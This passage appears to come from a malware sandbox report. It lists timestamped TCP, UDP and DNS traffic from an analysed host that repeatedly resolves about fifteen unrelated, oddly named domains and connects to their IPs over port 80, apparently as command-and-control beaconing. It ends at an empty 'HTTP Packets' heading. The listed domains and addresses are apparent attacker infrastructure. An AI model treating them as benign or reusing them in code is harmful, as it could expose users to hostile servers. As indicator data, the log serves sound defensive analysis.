Nov 12, 2024 07:57:27.389933109 CET	80	50011	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:27.390007973 CET	50011	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:27.404635906 CET	50011	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:27.409581900 CET	80	50011	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:28.214262009 CET	80	50011	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:28.317646980 CET	50011	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:28.330215931 CET	80	50011	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:28.330281019 CET	50011	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:28.911421061 CET	50011	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:29.930267096 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:29.935247898 CET	80	50012	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:29.935410976 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:29.947841883 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:29.952851057 CET	80	50012	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:30.756568909 CET	80	50012	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:30.869209051 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:30.869498968 CET	80	50012	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:30.869549990 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:31.458342075 CET	50012	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:32.479778051 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:32.484714985 CET	80	50013	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:32.491717100 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:32.503850937 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:32.508822918 CET	80	50013	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:32.508836031 CET	80	50013	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:33.322323084 CET	80	50013	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:33.384393930 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:33.434698105 CET	80	50013	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:33.434757948 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:34.021812916 CET	50013	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.040358067 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.045309067 CET	80	50014	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:35.045389891 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.054941893 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.059772015 CET	80	50014	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:35.862665892 CET	80	50014	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:35.911493063 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.975424051 CET	80	50014	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:35.976088047 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.977756977 CET	50014	80	192.168.2.7	91.184.0.200
Nov 12, 2024 07:57:35.982506037 CET	80	50014	91.184.0.200	192.168.2.7
Nov 12, 2024 07:57:41.069519043 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:41.074429989 CET	80	50015	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:41.074496031 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:41.090801001 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:41.095685005 CET	80	50015	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:41.918091059 CET	80	50015	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:41.918116093 CET	80	50015	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:41.918713093 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:42.373255968 CET	80	50015	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:42.377868891 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:42.599589109 CET	50015	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:43.617899895 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:43.623275995 CET	80	50016	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:43.623361111 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:43.637901068 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:43.643698931 CET	80	50016	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:44.474122047 CET	80	50016	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:44.474144936 CET	80	50016	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:44.474328041 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:44.597656012 CET	80	50016	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:44.597731113 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:45.153232098 CET	50016	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:46.165241003 CET	50017	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:46.170223951 CET	80	50017	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:46.170312881 CET	50017	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:46.182475090 CET	50017	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:46.187426090 CET	80	50017	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:46.187450886 CET	80	50017	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:47.693140030 CET	50017	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:47.900036097 CET	80	50017	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:47.900110960 CET	50017	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:48.758161068 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:48.763247967 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:48.763356924 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:48.770927906 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:48.776057005 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.604593039 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.604610920 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.604623079 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.604635000 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.604746103 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:49.726869106 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:49.726988077 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:49.752388954 CET	50018	80	192.168.2.7	217.160.0.60
Nov 12, 2024 07:57:49.757438898 CET	80	50018	217.160.0.60	192.168.2.7
Nov 12, 2024 07:57:54.825632095 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:54.830490112 CET	80	50019	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:54.830615997 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:54.842394114 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:54.847186089 CET	80	50019	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:56.063591003 CET	80	50019	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:56.063621998 CET	80	50019	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:56.063683987 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:56.187016010 CET	80	50019	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:56.187089920 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:56.349503994 CET	50019	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:57.368263006 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:57.373209000 CET	80	50020	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:57.373320103 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:57.385571957 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:57.390372038 CET	80	50020	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:58.407490015 CET	80	50020	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:58.407506943 CET	80	50020	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:58.407567024 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:58.547239065 CET	80	50020	161.97.142.144	192.168.2.7
Nov 12, 2024 07:57:58.547302961 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:58.896414995 CET	50020	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:57:59.915649891 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:00.153770924 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:00.153848886 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:00.166924000 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:00.172141075 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:00.172153950 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:01.078463078 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:01.078481913 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:01.078624010 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:01.214143038 CET	80	50021	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:01.216335058 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:01.677789927 CET	50021	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:02.724260092 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:02.729094028 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:02.729373932 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:02.754405975 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:02.759247065 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.762876034 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.762900114 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.762913942 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.763096094 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:04.805093050 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.805263996 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:04.951028109 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:04.952568054 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:04.956264019 CET	50022	80	192.168.2.7	161.97.142.144
Nov 12, 2024 07:58:04.961096048 CET	80	50022	161.97.142.144	192.168.2.7
Nov 12, 2024 07:58:10.190378904 CET	50023	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:10.195338011 CET	80	50023	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:10.195430040 CET	50023	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:10.209651947 CET	50023	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:10.215456009 CET	80	50023	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:11.062288046 CET	80	50023	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:11.200191975 CET	80	50023	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:11.200700045 CET	50023	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:11.724720001 CET	50023	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:12.743967056 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:12.748761892 CET	80	50024	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:12.750487089 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:12.763559103 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:12.768368959 CET	80	50024	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:13.617187023 CET	80	50024	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:13.662219048 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:13.755184889 CET	80	50024	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:13.755239964 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:14.271645069 CET	50024	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:15.290518999 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:15.295394897 CET	80	50025	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:15.295525074 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:15.307988882 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:15.312838078 CET	80	50025	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:15.312895060 CET	80	50025	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:16.156537056 CET	80	50025	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:16.209173918 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:16.294569969 CET	80	50025	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:16.294634104 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:16.818672895 CET	50025	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:17.837260008 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:17.842226982 CET	80	50026	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:17.842346907 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:17.850759029 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:17.855550051 CET	80	50026	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:18.708859921 CET	80	50026	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:18.771725893 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:18.845794916 CET	80	50026	144.76.190.39	192.168.2.7
Nov 12, 2024 07:58:18.846540928 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:19.189001083 CET	50026	80	192.168.2.7	144.76.190.39
Nov 12, 2024 07:58:19.193934917 CET	80	50026	144.76.190.39	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 07:54:51.044940948 CET	61427	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:54:51.753653049 CET	53	61427	1.1.1.1	192.168.2.7
Nov 12, 2024 07:55:08.005758047 CET	65147	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:55:08.257415056 CET	53	65147	1.1.1.1	192.168.2.7
Nov 12, 2024 07:55:21.552839994 CET	52762	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:55:21.597186089 CET	53	52762	1.1.1.1	192.168.2.7
Nov 12, 2024 07:55:35.084606886 CET	61578	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:55:35.339159966 CET	53	61578	1.1.1.1	192.168.2.7
Nov 12, 2024 07:55:48.711457014 CET	61550	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:55:48.866897106 CET	53	61550	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:02.601315975 CET	63797	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:03.620074034 CET	63797	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:04.613014936 CET	63797	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:05.136780977 CET	53	63797	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:05.136801004 CET	53	63797	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:05.136811972 CET	53	63797	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:19.116673946 CET	51435	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:19.164943933 CET	53	51435	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:32.523129940 CET	49976	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:32.564150095 CET	53	49976	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:45.821882010 CET	54213	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:45.834388971 CET	53	54213	1.1.1.1	192.168.2.7
Nov 12, 2024 07:56:59.149415016 CET	58110	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:56:59.189975023 CET	53	58110	1.1.1.1	192.168.2.7
Nov 12, 2024 07:57:13.212779045 CET	49833	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:57:13.398621082 CET	53	49833	1.1.1.1	192.168.2.7
Nov 12, 2024 07:57:27.321847916 CET	64714	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:57:27.366313934 CET	53	64714	1.1.1.1	192.168.2.7
Nov 12, 2024 07:57:40.994039059 CET	49969	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:57:41.066066980 CET	53	49969	1.1.1.1	192.168.2.7
Nov 12, 2024 07:57:54.760077953 CET	59204	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:57:54.822963953 CET	53	59204	1.1.1.1	192.168.2.7
Nov 12, 2024 07:58:09.963165998 CET	52260	53	192.168.2.7	1.1.1.1
Nov 12, 2024 07:58:10.187621117 CET	53	52260	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 12, 2024 07:54:51.044940948 CET	192.168.2.7	1.1.1.1	0x44a7	Standard query (0)	www.39978.club	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:08.005758047 CET	192.168.2.7	1.1.1.1	0x585d	Standard query (0)	www.vnxoso88.art	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:21.552839994 CET	192.168.2.7	1.1.1.1	0xef2c	Standard query (0)	www.rtpakuratkribo.xyz	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:35.084606886 CET	192.168.2.7	1.1.1.1	0xedd	Standard query (0)	www.pluribiz.life	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:48.711457014 CET	192.168.2.7	1.1.1.1	0x816c	Standard query (0)	www.idaschem.xyz	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:02.601315975 CET	192.168.2.7	1.1.1.1	0x8d3f	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:03.620074034 CET	192.168.2.7	1.1.1.1	0x8d3f	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:04.613014936 CET	192.168.2.7	1.1.1.1	0x8d3f	Standard query (0)	www.b2iqd.top	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:19.116673946 CET	192.168.2.7	1.1.1.1	0xf9d7	Standard query (0)	www.ipk.app	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.523129940 CET	192.168.2.7	1.1.1.1	0x154	Standard query (0)	www.jigg.space	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:45.821882010 CET	192.168.2.7	1.1.1.1	0x319c	Standard query (0)	www.dccf.earth	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:59.149415016 CET	192.168.2.7	1.1.1.1	0xdaf5	Standard query (0)	www.gamebaitopzo.fun	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:13.212779045 CET	192.168.2.7	1.1.1.1	0x8e03	Standard query (0)	www.megaweb8.top	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:27.321847916 CET	192.168.2.7	1.1.1.1	0x4ef0	Standard query (0)	www.wethebeststore.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:40.994039059 CET	192.168.2.7	1.1.1.1	0xdfa	Standard query (0)	www.solarand.online	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:54.760077953 CET	192.168.2.7	1.1.1.1	0x6d6c	Standard query (0)	www.030003452.xyz	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:58:09.963165998 CET	192.168.2.7	1.1.1.1	0xe026	Standard query (0)	www.basicreviews.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	www.39978.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.141	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.137	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.136	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:54:51.753653049 CET	1.1.1.1	192.168.2.7	0x44a7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		206.119.185.138	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:08.257415056 CET	1.1.1.1	192.168.2.7	0x585d	No error (0)	www.vnxoso88.art	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:55:08.257415056 CET	1.1.1.1	192.168.2.7	0x585d	No error (0)	77980.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:21.597186089 CET	1.1.1.1	192.168.2.7	0xef2c	No error (0)	www.rtpakuratkribo.xyz	rtpakuratkribo.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:55:21.597186089 CET	1.1.1.1	192.168.2.7	0xef2c	No error (0)	rtpakuratkribo.xyz		66.29.146.173	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:35.339159966 CET	1.1.1.1	192.168.2.7	0xedd	No error (0)	www.pluribiz.life		209.74.64.58	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:55:48.866897106 CET	1.1.1.1	192.168.2.7	0x816c	No error (0)	www.idaschem.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:55:48.866897106 CET	1.1.1.1	192.168.2.7	0x816c	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:55:48.866897106 CET	1.1.1.1	192.168.2.7	0x816c	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:05.136780977 CET	1.1.1.1	192.168.2.7	0x8d3f	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:05.136801004 CET	1.1.1.1	192.168.2.7	0x8d3f	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:05.136811972 CET	1.1.1.1	192.168.2.7	0x8d3f	No error (0)	www.b2iqd.top		20.2.208.137	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:19.164943933 CET	1.1.1.1	192.168.2.7	0xf9d7	No error (0)	www.ipk.app		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:19.164943933 CET	1.1.1.1	192.168.2.7	0xf9d7	No error (0)	www.ipk.app		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		96.126.123.244	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		198.58.118.167	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		72.14.185.43	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.56.79.23	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		173.255.194.134	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.33.30.197	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.33.2.79	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.33.18.44	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.33.20.235	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		72.14.178.174	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.33.23.183	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:32.564150095 CET	1.1.1.1	192.168.2.7	0x154	No error (0)	www.jigg.space		45.79.19.196	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:45.834388971 CET	1.1.1.1	192.168.2.7	0x319c	No error (0)	www.dccf.earth	dccf.earth		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:56:45.834388971 CET	1.1.1.1	192.168.2.7	0x319c	No error (0)	dccf.earth		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:45.834388971 CET	1.1.1.1	192.168.2.7	0x319c	No error (0)	dccf.earth		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:59.189975023 CET	1.1.1.1	192.168.2.7	0xdaf5	No error (0)	www.gamebaitopzo.fun		104.21.69.93	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:56:59.189975023 CET	1.1.1.1	192.168.2.7	0xdaf5	No error (0)	www.gamebaitopzo.fun		172.67.206.245	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:13.398621082 CET	1.1.1.1	192.168.2.7	0x8e03	No error (0)	www.megaweb8.top		172.67.221.220	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:13.398621082 CET	1.1.1.1	192.168.2.7	0x8e03	No error (0)	www.megaweb8.top		104.21.59.91	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:27.366313934 CET	1.1.1.1	192.168.2.7	0x4ef0	No error (0)	www.wethebeststore.online	wethebeststore.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:57:27.366313934 CET	1.1.1.1	192.168.2.7	0x4ef0	No error (0)	wethebeststore.online		91.184.0.200	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:41.066066980 CET	1.1.1.1	192.168.2.7	0xdfa	No error (0)	www.solarand.online	solarand.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:57:41.066066980 CET	1.1.1.1	192.168.2.7	0xdfa	No error (0)	solarand.online		217.160.0.60	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:57:54.822963953 CET	1.1.1.1	192.168.2.7	0x6d6c	No error (0)	www.030003452.xyz		161.97.142.144	A (IP address)	IN (0x0001)	false
Nov 12, 2024 07:58:10.187621117 CET	1.1.1.1	192.168.2.7	0xe026	No error (0)	www.basicreviews.online	basicreviews.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 12, 2024 07:58:10.187621117 CET	1.1.1.1	192.168.2.7	0xe026	No error (0)	basicreviews.online		144.76.190.39	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.39978.club

www.vnxoso88.art

www.rtpakuratkribo.xyz

www.pluribiz.life

www.idaschem.xyz

www.b2iqd.top

www.ipk.app

www.jigg.space

www.dccf.earth

www.gamebaitopzo.fun

www.megaweb8.top

www.wethebeststore.online

www.solarand.online

www.030003452.xyz

www.basicreviews.online

HTTP Packets

